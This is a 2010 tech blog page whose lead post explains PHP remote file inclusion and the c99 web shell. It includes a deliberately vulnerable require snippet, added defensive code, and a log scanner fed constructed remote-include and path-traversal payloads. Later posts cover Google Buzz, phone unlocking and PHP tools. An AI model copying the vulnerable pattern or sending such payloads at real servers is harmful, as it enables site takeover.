Brain Dump

The Horrors of C99.php

Posted in Brain Dump, Code, IT on February 22nd, 2010 by Eric Lamb – Be the first to comment

If you were a sysadmin a few years ago, and you had php on your servers, you’re probably already familiar with c99. In case you haven’t had the personal pleasure, c99, or specifically c99.php (hint: check the source), is the name of a script used by hackers to gain access to a web server running php using an exploit technique called Remote File Inclusion.

A Little History

See, back in the day some php developers were pretty stupid. (Admit it; you were stupid once too.) What other explanation could there be for writing code that allowed the injection of arbitrary routines into a program? Trivially easy too.

To be fair, PHP was to blame a little for this as well. Given PHP’s high adoption, and design, by, and for, newbie programmers, allowing such a technique by default was just ill conceived, and maybe even a little negligent. I understand the desire, and sometimes need, for a technique that could be dangerous but to enable the feature by default… damn man…

So, the risk was known, yet code was still being written (like the below example) that allowed remote file inclusion to be possible. Mostly because of the aforementioned default setting.

<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
{
	$color = $_GET['COLOR'];
}
require( $color . '.php' );
?>

BTW, if you currently write code that does anything like the above, frankly, you’re an idiot. You aren’t nearly as smart and clever as you think you are. I promise you this will bite you. Bad too.
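For contrast with the snippet above, here is a hardened version of the same lookup. It is an added example, not code from the original post. The `red` and `green` templates, the function names and the temp directory are assumptions made for the demo. The request value only ever selects a key from a fixed map, and `allow_url_include` (the php.ini directive that controls URL includes since PHP 5.2) is checked as well.

```php
<?php
declare(strict_types=1);

// Allowlist of request value => template file. Nothing outside this map is ever loaded.
// 'red' and 'green' are assumptions for this example; the post only shows 'blue'.
const COLOR_TEMPLATES = [
    'blue'  => 'blue.php',
    'red'   => 'red.php',
    'green' => 'green.php',
];
const DEFAULT_COLOR = 'blue';

/**
 * Turn the untrusted COLOR value into a path that is safe to require.
 * Unknown, non-string or hostile values fall back to the default template.
 */
function resolve_color_template($requested, string $templateDir): string
{
    // $_GET['COLOR'] is an array when the request uses COLOR[]=..., so check the type.
    $key = is_string($requested) ? strtolower(trim($requested)) : DEFAULT_COLOR;
    if (!array_key_exists($key, COLOR_TEMPLATES)) {
        $key = DEFAULT_COLOR;
    }

    $base = realpath($templateDir);
    if ($base === false) {
        throw new RuntimeException('template directory does not exist');
    }

    // Defence in depth: the resolved file must exist and live inside the template
    // directory, even if someone later adds a careless entry to the map.
    $path   = realpath($base . DIRECTORY_SEPARATOR . COLOR_TEMPLATES[$key]);
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('template missing or outside the template directory');
    }
    return $path;
}

/** True when php.ini still lets include/require fetch URLs. */
function remote_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

// --- Demo on constructed input ----------------------------------------------
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_' . bin2hex(random_bytes(4));
mkdir($dir);
foreach (COLOR_TEMPLATES as $file) {
    file_put_contents($dir . DIRECTORY_SEPARATOR . $file, "<?php // $file\n");
}

// Constructed request values: two valid, one missing, one array, two that must be refused.
$constructedInputs = [
    'red',
    'GREEN',
    null,
    ['x'],
    '../../etc/passwd',
    'http://example.invalid/c99.txt?',
];
foreach ($constructedInputs as $input) {
    $path = resolve_color_template($input, $dir);
    printf("%-36s => %s\n", json_encode($input, JSON_UNESCAPED_SLASHES), basename($path));
    require $path; // only ever one of the three local files
}

echo 'allow_url_include: ',
    remote_include_enabled() ? 'ON (turn it off in php.ini)' : 'off', "\n";

// Clean up the demo files.
array_map('unlink', glob($dir . DIRECTORY_SEPARATOR . '*.php'));
rmdir($dir);
```

In a real page the call would be `require resolve_color_template($_GET['COLOR'] ?? null, __DIR__ . '/templates');`, where the `templates` directory name is likewise an assumption.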

About C99.php

So, using a technique like the above opens you up to learning first hand about c99.php. Finding information about the program itself is a little tricky but there are a couple examples that highlight just how devastating it can be.

When malicious intruders compromise a web server, there’s an excellent chance a famous Russian PHP script, r57shell, will follow. The r57shell PHP script gives the intruder a number of capabilities, including, but not limited to: downloading files, uploading files, creating backdoors, setting up a spam relay, forging email, bouncing a connection to decrease the risk of being caught, and even taking control of SQL databases. All these functions become readily available through an easy to use web interface, but now you can fight back.

Using the above explanation, which I agree with, c99.php acts as an interface to control your server. Once it’s on your server an attacker has easy access to view all the files and their contents, make changes to the system, upload new files, manipulate the database(s) and more.

Quite the nasty little script but pretty elegant in how it’s implemented. c99 is a completely standalone script; even the images are embedded inside using base64!

Until a month ago I would have thought the risk of encountering c99.php in the wild would have been small these days. Then, SMACK!!, a client had a site get hacked (quick CYA; that I didn’t work on :) ) using c99. So be warned. It’s out there and if you’re not smart, or if you’re a lazy, lazy, coder, c99 will get you.
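If you want to know whether anyone has been probing your own site this way, the web server access log is the place to look. The following is an added example, not part of the original post: it flags requests where a query parameter's value is itself a URL, which is what a remote file inclusion attempt against code like the `COLOR` snippet looks like in a log. The log lines, addresses and host names are constructed, and the function names are made up for the example.

```php
<?php
declare(strict_types=1);

// A parameter value that begins with one of these schemes is a remote-include candidate.
const REMOTE_URL_RE = '~^\s*(?:https?|ftp)://~i';
// Common/Combined Log Format: host ident user [time] "METHOD URI PROTO" status ...
const ACCESS_LINE_RE = '~^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3})~';

/** Split one access-log line into the fields we need, or null if it does not parse. */
function parse_access_line(string $line): ?array
{
    if (!preg_match(ACCESS_LINE_RE, $line, $m)) {
        return null;
    }
    return [
        'client' => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'uri'    => $m[4],
        'status' => (int) $m[5],
    ];
}

/** Return every query parameter in $uri whose decoded value starts with a remote URL. */
function url_valued_params(string $uri): array
{
    $pos = strpos($uri, '?');
    if ($pos === false) {
        return [];
    }
    // parse_str() percent-decodes once and builds nested arrays for a[]=... forms.
    parse_str(substr($uri, $pos + 1), $params);

    $hits = [];
    array_walk_recursive($params, function ($value, $name) use (&$hits) {
        if (is_string($value) && preg_match(REMOTE_URL_RE, $value)) {
            $hits[] = ['param' => (string) $name, 'value' => $value];
        }
    });
    return $hits;
}

/** Scan log lines and return one finding per URL-valued parameter. */
function find_rfi_candidates(array $lines): array
{
    $findings = [];
    foreach ($lines as $n => $line) {
        $req = parse_access_line($line);
        if ($req === null) {
            continue; // unparseable line, skip it
        }
        foreach (url_valued_params($req['uri']) as $hit) {
            // A 200 means the script ran and answered, so those go to the top of the pile.
            $findings[] = $req + $hit + ['line' => $n + 1, 'served' => $req['status'] === 200];
        }
    }
    return $findings;
}

// Constructed sample log (documentation address ranges, .invalid host name).
$constructedLog = [
    '192.0.2.10 - - [22/Feb/2010:10:01:02 +0000] "GET /index.php?COLOR=red HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.7 - - [22/Feb/2010:10:03:44 +0000] "GET /index.php?COLOR=http://example.invalid/c99.txt? HTTP/1.1" 200 48211 "-" "-"',
    '203.0.113.7 - - [22/Feb/2010:10:03:51 +0000] "GET /old.php?COLOR=http%3A%2F%2Fexample.invalid%2Fc99.txt%3F HTTP/1.1" 404 312 "-" "-"',
    '198.51.100.4 - - [22/Feb/2010:10:05:00 +0000] "GET /login.php?next=/account HTTP/1.1" 302 0 "-" "-"',
];

foreach (find_rfi_candidates($constructedLog) as $f) {
    printf(
        "line %d  %s  %s %s  param=%s value=%s%s\n",
        $f['line'], $f['client'], $f['method'], $f['status'],
        $f['param'], $f['value'], $f['served'] ? '  <-- answered with 200' : ''
    );
}
```

Parameters that legitimately carry URLs (a redirect target, for instance) will match too, so treat the output as a triage list and read the code behind each flagged script before drawing conclusions.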

Google Didn’t Fuck You; You Did

Posted in Brain Dump, Rant on February 15th, 2010 by Eric Lamb – Be the first to comment

With the release of Google Buzz last week a lot of people have been screaming bloody murder over some privacy concerns they have and Google’s perceived lack of forethought on the matter.

First, Google Buzz appears to be a FriendFeed clone that Google just launched about a week (or 2) ago. Initially, it was enabled inside of all gmail accounts by default without any authorization to the contrary. I haven’t had the opportunity to try it though. Not because I don’t use gmail (I do; sorta) but because I use Google Apps gmail which wasn’t a part of the rollout.

From what I can glean; Google Buzz works by parsing your contact list and then making connections between everyone in it and displaying their social network activity info publicly for all to see (seriously, just like FriendFeed). Make sense? No? Here’s the Crunchgear explanation of Google Buzz:

Google Buzz is a social network and sharing product built by Google. Based within Google Profiles, Buzz offers a stream of status updates, pictures, links, and videos from your friends. You can “like” these items and you can comment on them. Updates from Flickr, Picasa, Google Reader, or Twitter can also be automatically imported into a Buzz stream. Buzz will recommend items you might like based on your friends’ activity.

So, apparently, one of the “features” of Google Buzz is that when it was initially released it displayed your contact list publicly which raised all sorts of hell from people who can’t afford for this to happen (think lawyers, journalists, etc).

This smacks of a high level of naivete on the part of most of the users. Under what delusion are people living to think that they have any expectation of privacy from a publicly traded company? Yes, I know they claim to care about your privacy, and I’m sure on a personal level the people working for Google do, in fact, care about your privacy. But the organization itself? Not a fucking chance.

Let’s get serious here; as stated above, Google is a publicly traded company which means their priorities start and end with cash ($$$). Frankly, it’s naive to think otherwise. Ask any corporate officer and they’ll tell you they have a responsibility to their shareholders. This is a notorious loss for consumers but it’s the reality nonetheless. Cry all you want but Google fucking their users in this way did ensure they launched a new social network with millions of users. From a fiscal standpoint, this was a HUGE win even with all the bitching and moaning. Even taking into account any users who would leave Google (along with any ill will this may have created) this was still a winning strategy for launch.

If privacy is an issue then, it seems to me, that you really should have taken greater measures to protect yourself. Relying on Google to protect something like this screams of escapism and finger pointing. Guess what? It’s your fault. Deal with that instead of crying that a publicly traded company that provides a service you use for free does something in a way that you don’t like.

Do I think that Google was right in any way for doing what they did? Not for a second. That said, people need to take responsibility for their own needs instead of blindly trusting a for profit company to do it for them. Yes, even when that company claims to “do no evil”.

WP-Click-Track 0.7 Released (Umm Last Week)

Posted in Brain Dump on December 29th, 2009 by Eric Lamb – Be the first to comment

I hadn’t really had much time to announce this (what with the holidays and stuff) but last week WP-Click-Track 0.7 was released. This release includes a few bug fixes and a couple new features. I’d planned to release this a while ago but testing took a little longer than anticipated but it’s finally done.

There were a couple minor, edge, bugs that I don’t want to go into detail about but there were 2 in particular that deserve a mention.

First, there was a bug fix for SSL enabled admins. This one I hadn’t really anticipated; I’d never thought someone would use ssl for the admin panel. The problem was that if you went to the admin through ssl the graphs wouldn’t render properly. My bad.

Then there was an issue in the graphs. If the charted number was over 1,000 the chart would basically throw up. Rookie move on my part but some escaping fixed that right up. If you ran into this bug I’m really sorry.

0.7 also includes an improved cookie model. I admit, I’ve been completely lazy about cookie management for years now. Yes, sessions are nice but when you’re building for a multi-server environment sessions can get a little tricky. Problem is that there are some pretty specific rules for cookies and just setting a cookie willy nilly, without any thought to the implications, can screw things up. Now it’s much, much, better.

Among the additions there’s a new configuration value to disable tracking of internal links. This should help with all the clicks in people’s galleries I’ve been hearing so much about :)

Speaking of configuration the entire configuration section has been rewritten to be more user friendly. Instead of the HUGE and confusing single page everything is organized into tabs and should, hopefully, make for a better experience when you do have to configure something.

Anyway, you can install it within the WordPress plugin manager or if you want to take a look at the code here you go.

How To Unlock AT&T Blackberry

Posted in Brain Dump, IT on December 21st, 2009 by Eric Lamb – Be the first to comment

My business partner recently had her phone literally break apart in her hands. Since communication between us is pretty crucial I decided to give her a backup Blackberry Curve I had as a replacement for my Blackberry Bold. Problem was that the Curve was bought through AT&T and she uses T-mobile. The phone would have to be unlocked.

Initially, I was a little nervous about the process of unlocking the Blackberry. I’d never personally tried anything like this and my direct experience with the process was that a 3rd party company would have to be brought into the mix. I didn’t relish the idea of paying someone to handle what seemed to be a simple exercise when I’m capable of pushing buttons on a freaking phone.

Turns out it’s actually extremely easy to handle this yourself though it does require a phone call to AT&T support. Simply call them up and they’ll ask you for your IMEI code; it’s under the battery on the serial number label. They’ll send you an email, like the below, that’ll walk you through the process.

Your device unlock request was received and processed, see below for details:

IMEI: YOUR_IMEI_NUMBER

Unlock Code: YOUR_UNLOCK_CODE

Caution: If this process is unsuccessful ten times in a row, the phone will be permanently locked to the at&t network. Do not attempt to enter the code more than one (1) time total.  Instructions below will assist you in unlocking your device, if these steps are unsuccessful please contact us at 1-800-331-0500 or (916) 843-4685 from overseas.

Blackberry 8310

Follow these steps to unlock device:

1. Turn off the radio! VERY IMPORTANT

2. Go to “Options”

3. Scroll to and select “Advanced Options”

4. Click on “SIM Card”

5. Type “MEPD” (You will not see on display what is being typed. To obtain a “P” double tap “OP” key)

6. Type “MEP2” (To obtain a “P” double tap “OP” key. Press “ALT” key to obtain a “2”)

7. Enter the unlock code

8. Press enter

9. Reboot device. Device is now unlocked.

Note: To verify the IMEI, dial *#06# on device’s keypad, 15 digit # IMEI will display on the screen.  If this sequence does not work, pull the back/battery off the phone and the IMEI will be listed on the back of the phone.

All told the total time invested was only about 5 minutes. Seriously, 5 minutes. So why would I want to pay someone for this again?

Windows 7 Upgrade Experience

Posted in Brain Dump, IT on December 10th, 2009 by Eric Lamb – Be the first to comment

When I purchased my newest laptop back in July, from Best Buy, it came with a free upgrade to Windows 7 when it came out a few months later. Fast forward to December and I’ve since received the new operating system and have installed it on the laptop. Since a lot of people are going to be going through the same thing I put together some notes about the experience.

Because the promotion was for a version of Windows 7 that was the same flavor as the installed Windows Vista, I was given a 64bit Windows 7 Home Premium copy. Personally, I would have preferred Business or Ultimate but ok, fine Home Premium it is. At least this meant that I wouldn’t have to do a clean install so I could keep all files and programs where they were (still backing up the data of course).

The upgrade package came with 2 discs; the Windows 7 disc and a driver upgrade disc. The instructions said to insert the upgrade disc first and I’ll be prompted to enter disc 2 when required. Doing so started an upgrade program that inspected my system and warned me about deauthorizing my iTunes account which immediately made me feel good about the experience.

All told the install took around 3.5 hours and was like watching water boiling. I did it super late at night but I was still up and every time I would check on it I swear the progress rarely looked like it was making any progress. Still, it is Windows, so I was used to this; just wait and be patient, it’ll finish. And eventually it did.

Upon first booting up there were a couple issues. One was my fault. The others… not so much. Probably the worst offense was that I had no Internet connectivity. I checked both my wired NIC and the wifi and both were working fine; I could connect to my router through both and I could find my Xbox and PS3 on the network. I just couldn’t get online. I eventually found that this was caused by a conflict between Eset’s firewall (which I had disabled in Vista) and the native Windows firewall. Uninstalling Eset and reinstalling it solved the issue.

I also had an issue with my local Apache webserver working. After checking the logs it turned out to be a soft link I had created under Vista to link the conf directory (makes editing the files from my working directory that much easier). Creating a new link solved the issue nicely.

The last issue is with the touchpad; and I haven’t really fixed it yet. At first, Windows thought the touchpad was a PS/2 mouse. This wouldn’t be an issue except I like the scrolling functions on the touchpad and the PS/2 drivers don’t support it. This seemed like a cut and dry driver issue except I installed all the latest drivers for my laptop that Gateway offered and it still doesn’t work all that well. Yes, it’s there but not in any real functional way. It’s jerky and hesitant when it works (around 30% of the time). Not enough to get me to downgrade but still a pain.

I’ve never really had an issue with Vista but I was still excited about Windows 7. Even though there were a couple hiccups during the install, and that my touchpad isn’t operating 100%, I’m still really happy with the experience.

IMAP on Blackberry: The Poor Mans BES

Posted in Brain Dump, IT on December 7th, 2009 by Eric Lamb – Be the first to comment

It’s crazy to me how important email is; it’s almost 2010 and I’m still, still, relying on email for communication more than anything else. Considering just how broken email is, along with how I know it’s broken, this isn’t a little surprising. Managing the sheer amount of email I get used to be pretty easy but now… it’s a little more painful but still manageable.

When I had the day job I had access to a nice little network with Exchange 2003 and the latest Blackberry Enterprise Server (BES). It never really occurred to me how spoiled this would make me but, now that it’s gone, it’s pretty obvious how much I relied on it for my email management.

Why? Syncing. Loved the whole syncing aspect; open an email on your Blackberry and the email was marked as open in Exchange. Send an email from your Blackberry and it appeared in your sent folder in Outlook. Even better if you sent an email in Outlook, through Exchange, it was put in your sent folder on your Blackberry. Simple. This was great for things like filing and responding to emails. Put simply, using the Exchange/BES combo allowed you to keep all your communication in sync.

Then I get unplugged from the BES and have to set up a new solution. First, I went to POP3 (as I was most familiar with the protocol) but this was a cluster fuck of a bad idea. Yes, email was put on the Blackberry but it’s a one way method and nothing was kept in sync. I’d do something on the device and when I would go to Gmail nothing would be there; this couldn’t do.

I also tried the native Gmail Blackberry app but this too wasn’t ideal; I hated how it wasn’t truly a “native” app in that other apps would still open the default Blackberry message program to do anything email related. For example, if I clicked on an email on a web page while on the Blackberry it wouldn’t open the Gmail app but the native messaging one instead. I was surprised how much this happened and how much it bothered me but it did.

Then I learned that Gmail has IMAP support and have been using it ever since. So far, IMAP is the closest approximation of the BES experience I’ve found. It’s not without its issues or anything, and technically it’s not supported by Google, but it’s the best solution I’ve found.

Probably the biggest issue I have with the IMAP integration is that mail manipulated on the Gmail site doesn’t get synced to my Blackberry. This isn’t too bad since I usually only use the Gmail site for sending but if I want to keep things in sync I have to treat the Blackberry as the master.

To keep the calendar and contacts in sync requires the use of another Blackberry app called Google Sync. Google Sync keeps your contacts and calendar synced up between Google Calendar and Gmail contacts and your Blackberry.

While it’s not a perfect solution I’ve been mostly happy with IMAP and Gmail on the Blackberry. It’s way, way, better than paying money for an outsourced BES / Exchange account.

Code Like It’s 1999 With Dolphin CMS

Posted in Brain Dump, Programming, Rant on December 2nd, 2009 by Eric Lamb – 1 Comment

It’s interesting how life can throw you a little too much coincidence. For example, I was having a nice conversation (with a pretty smart dude) where it was mentioned how much more painful development on large projects used to be back in the confused days of early PHP. Then life decided to highlight this little message with a project using Dolphin 6.1 from Boonex.

Coding Like It's 1999 :: Dolphin CMS

Your Soul is the Fish

The work came from a client that had a straight-forward install of Dolphin. She wanted to customize it a bit to make it a little more user friendly; nothing too difficult. Before the project came to me the client had gone the usual route of hiring someone on the cheap who ended up not being up to the task and was, subsequently, left high and dry. This left me with a project that had some of the work started, but not finished, which added to the pain a little but Dolphin sure has its own ways of ruining a mood.

In case anyone else has the misfortune of having to work on a Dolphin CMS project I thought I’d highlight just what you’re in for.

The Good

To be fair, for as bad of a nightmare Dolphin CMS is as a project (compared to coding standards in today’s landscape), it does have one or two(ish) redeeming qualities.

For one thing Dolphin CMS has a pretty logical directory structure. Looking for the language file? Why it’s in the “lang” directory of course. Looking for a class? Just check out the “inc/classes” directory. Admittedly, this is a small thing if you’re using a modern IDE but I still appreciate it (so many programs I’ve run into lately don’t even include this level of logic).

Dolphin CMS also has what can only be called an advanced admin panel. This thing allows you to customize all sorts of areas including the content of pages as well as the layout of the pages. I had a lot of fun playing with that thing. This is double edged though because it serves no practical purpose if you want something unique and cool. For newbies though I think this is a nice feature to learn about the possibilities for a website.

The Bad

Right off, Dolphin CMS is PHP 4 compatible. This is just silly; it’s fucking 2009 already and Dolphin CMS using PHP 4 as a baseline is probably more to blame for the rest of this list than anything else. If you’re going to use old technology why not use old coding standards? In that situation I imagine complacency and laziness would come naturally.

Then there’s the use of short tags in Dolphin CMS. I admit to having a problem myself with maintaining this standard (it’s still natural for me in a template file) but it’s irritating if you have short tags disabled in your ini file.

Another offense: inline HTML and PHP together ALL OVER THE PLACE. You can’t hardly open any file, seriously, any file, without wanting to tear your eyes out of your skull from the cluster fuck in front of you. Add to that the confusion in that the system has a template system (see below) Dolphin CMS just doesn’t use it for the parts you’d actually want to change. Gave me a headache when I would think about it.

As mentioned above there is a template system (of sorts) but it doesn’t actually templatize anything. I guess it’s more of a layout system but considering the majority of templates only had header, footer and content references it’s a poorly utilized one. To make it even worse though Dolphin CMS uses a hard-coded, numerically indexed, naming convention. Want to know what template file your file is using? Just open up that file and look for a variable called “$_page['name_index']” and use the value as a reference. Seriously, why would you use a number instead of something meaningful like the name of the file (or similar)?

Back Pedaling

I just got done working with Dolphin CMS so, yes, I’m a little raw. Wah; I know. Still, the fact remains that Dolphin CMS is one of the biggest pains in the ass to work with that I’ve run into in quite some time. It’s not too complicated to work on, its structure should be familiar to anyone who’s worked with PHP ten years ago, which is its biggest issue. You have to dumb yourself down to work with it. And for the love of god don’t try and abstract anything.

The most heinous thing though is that Boonex actually charges for this filth. Real money too. Crap can be excused if it’s free but there’s nothing worse than paying for a box full of horse shit.

Simple Project Profiling With PHPLoc

Posted in Brain Dump, Programming on November 24th, 2009 by Eric Lamb – 1 Comment

One of the most natural things to do while being an obsessive programmer is focusing on the minutia. Not only do our projects have to perform and function to our standards but they also have to be structured “just so” with just the right comment style and just the right indentation to space ratio (4 of course!). Point being that, for me, it’s ridiculously easy to spend time and energy focusing on, what amounts to in the end, as trivial. I was reminded of this while playing around with the latest release of PHPLoc (1.40).

Photo: Grahambones

PHPLoc is a project by Sebastian Bergmann that measures the size of a PHP project. In a nutshell PHPLoc is a project analyzer that shows details like amount of classes, files, directories and total Lines Of Code (PHPLoc get it?) to name a few features. It’s run from the command line and I had no issue getting it to work on Windows (huge plus for quality IMHO).

According to the Git repository:

phploc is a tool for quickly measuring the size of a PHP project.

The goal of phploc is not to replace more sophisticated tools such as phpcs, pdepend, or phpmd, but rather to provide an alternative to them when you just need to get a quick understanding of a project’s size.

PHPLoc works as a PEAR module (requires PEAR installer version 1.8.1 at least) and as such is really easy to install. There’s some great instructions on the Git site that I had zero issues with (outside of having to update PEAR) so I won’t go into detail here.

Here’s an example of the output when run against a Zend Framework 1.9 distribution:

C:\php>phploc --count-tests C:\ProjectFiles\ZF
phploc 1.4.0 by Sebastian Bergmann.
 
Directories:                                        393
Files:                                             1856
 
Lines of Code (LOC):                             372292
  Cyclomatic Complexity / Lines of Code:           0.11
Comment Lines of Code (CLOC):                    173793
Non-Comment Lines of Code (NCLOC):               198499
 
Namespaces:                                           0
Interfaces:                                          94
Classes:                                           1758
  Abstract:                                         155 (8.82%)
  Concrete:                                        1603 (91.18%)
  Lines of Code / Number of Classes:                167
Methods:                                          12377
  Scope:
    Non-Static:                                   11517 (93.05%)
    Static:                                         860 (6.95%)
  Visibility:
    Public:                                        9886 (79.87%)
    Non-Public:                                    2491 (20.13%)
  Lines of Code / Number of Methods:                 23
  Cyclomatic Complexity / Number of Methods:       2.78
 
Anonymous Functions:                                  0
Functions:                                            0
 
Constants:                                         3361
  Global constants:                                   1
  Class constants:                                 3360
 
Tests:
  Classes:                                            2
  Methods:                                            0

As you can see, PHPLoc gives some really nice insight into a project. I have to admit I’m more interested in the OCD satisfaction than the practical reasons but it’s still cool. Definitely check it out if you’re looking to get some interesting though completely trivial information about your project.

Mea Culpa Twitter. Mea Culpa…

Posted in Brain Dump, Business on November 4th, 2009 by Eric Lamb – Be the first to comment

Anyone who knows me knows I’m not a fan of social networks. Frankly, I find participating in social networks to be a false representation of social behavior; a farce I just don’t have the desire to humor. Not to get too preachy here but, well, this is my blog so na-na-nana-na:

The way I look at social networks is as time sinks with little practical use compared to the maintenance and care required for the account. Not that I find them useless though. I had spent the last 4 years (around) working for a social marketing agency and have personally witnessed the benefits of social networks in building brand awareness and loyalty. But the work required entailed a dedicated, college educated, person and a couple student interns working 40 hours a week each to accomplish.

Me? I have shit to do thankyouverymuch. I want to spend my time producing ideas, projects and programs. I don’t want to spend any time tending to a social network profile with ephemeral friendships and connections. But apparently Twitter is different. Michael Lop sums it up nicely:

Twitter is a social network, yes, but it’s a social network without the superpoke scrabtaculous zombie noise and, for that, I’m thankful, because I’ve got work to do. Yes, I could spend days tidying my profile and scrubbing my friends list, but to what end? I want to know more people, and sure, it’s interesting to see what they’re up to, but what I really want to know is what is going on inside their heads with a minimum of fuss.

So once again I’m late to a party acting like they’re lucky to have me. I have finally, finally, begun to see the usefulness and benefits of Twitter. It’s weird because I’ve been working so closely with Twitter for the last year interacting with their API and I never “got” it until recently. I’m actually a little embarrassed about this. So many of my personal friends are on Twitter along with my peers online and I was a little pompous about the whole thing. My Bad.

What ended up turning my perspective around was the realization that Twitter didn’t take any real effort. Outside of the marketing and announcement use (blog posts/updates, code release, project release, etc) all other status updates Twitter needs can be completely random thoughts along the lines of a friendly conversation.

One key difference between Twitter and this blog is that this blog, and the discussion in it, are not in any way personal towards me or anyone else. But with Twitter, well, that can be, and probably should be, personal and a little intimate. Not completely understood, but the conversation appears to need to be a little more random and personal.

When I ask myself why I have this blog (and really why I think anyone has a blog), and if there’s a requirement of complete honesty, career is definitely at the top of the list. Yes there’s a love of writing and the conversation. But after that, career and ambition are what really motivates me to write and drives this site. (And yes ego has a little to do with it too but that’s a whole other discussion :) )

So, we’re really talking about a tool of promotion and marketing. I can understand that a little better for some reason.

So yes. I am on Twitter now and I actually like it. It’s liberating to be so open (which doesn’t make much sense to me at all… but there it is). If you’re a fan of this blog (hell, even if you hate me and think I’m an idiot) you might want to follow me :) .

Welcome to The McDonaldification of Web Development

Posted in Brain Dump, Business, Rant on November 2nd, 2009 by Eric Lamb – 2 Comments

When I was a kid I remember McDonald’s as having some of the best food and providing the best experience ever. Just the thought of going there was exciting. Breakfast, lunch and dinner; it didn’t matter what meal it was. They went out of their way to, at least try, to make the experience fun for the kids. Yes, this was part of a plan to get the kids hooked to bring in the family (which it did in spades) but it was one of those rare strategies that was win-win for both the customer and company.

Fast forward 20 years (sigh…) and McDonald’s and its ilk are the lowest of the low when it comes to quality of service and product. It’s been years since any fast food restaurant has provided me with an experience worthy of my money; the food is always horrible processed shit, and the service (even at the most basic of basic levels) is completely nonexistent. Hell, I can’t remember the last time I was given ketchup with fries without having to ask for it…

Having worked in web development professionally for the last eight years I’m starting to notice a similar pattern in this industry. What was once an industry ruled by high profits for a job performed by professionals (mostly anyway) has quickly become an industry full of amateurs and scammers (mostly) trying to make as much money with as little thought to quality as quickly as possible. I’ve spoken before about the lack of quality I find in a lot of programmers I work with, and while I’m not saying it’s the complete cause, I do think there’s a link.

Oddly, I’m in the minority here. In my, limited, exposure to other programmers I can say definitively that the majority just plain suck; mostly because they refuse to grow and learn.

I’ve heard all the arguments before, “My weekends are mine”, “I work hard enough; I don’t have the energy”, and the best ever, “My employer should pay for this like Google does. Whah!!”. (I know Google doesn’t, in fact, do this but people still say it.) All just pure crap excuses for maintaining a level of competence just high enough to not get fired.

Bottom line: working 8 hours a day is just not enough to matter. If you think you’re a programmer and you don’t spend time improving your skills you’ll quickly, really quickly, become obsolete. It just doesn’t matter if .Net is going to be around forever and your employer won’t ever upgrade from 1.1; you’re a hack (and not in a good way).

Now that I’m an active freelancer I’m really, really, starting to see the differences. Time and time again I end up taking a meeting with someone who has just been worked over by others in this field. The stories some of these companies and people have are just appalling and I’ve heard some doozies. Worst of all, behavior like this tends to skew their perspective and they view all freelancers as suspect. Too much of my time is spent building confidence in me as a professional; it’s really starting to become laughable.

It was all really quite the mystery until I recently reached out on craigslist to find a designer for a WordPress theme (I need to update this site BAD). I was pretty explicit that all I was looking for was a PSD file that I would personally turn into a WordPress theme but 4 out of 5 responses to the ad indicated that the respondent hadn’t even read the post. Frankly, it was irritating wading through the crap and, obviously, automated responses.

This is troubling for a couple reasons. For one thing it basically indicates, to me anyways, that the person (company, freelancer, whatever) had very little regard for what I wanted, instead opting for a fastest gun approach. The number of emails I received immediately after posting my ad was around 20 and after reviewing each one it was obvious they were automated. I pity the individual or company who entertains these people.

The long term harm this can cause for other programmers (much less themselves) is completely short sighted. Crappy work begets a crappy experience for the client. Simple.
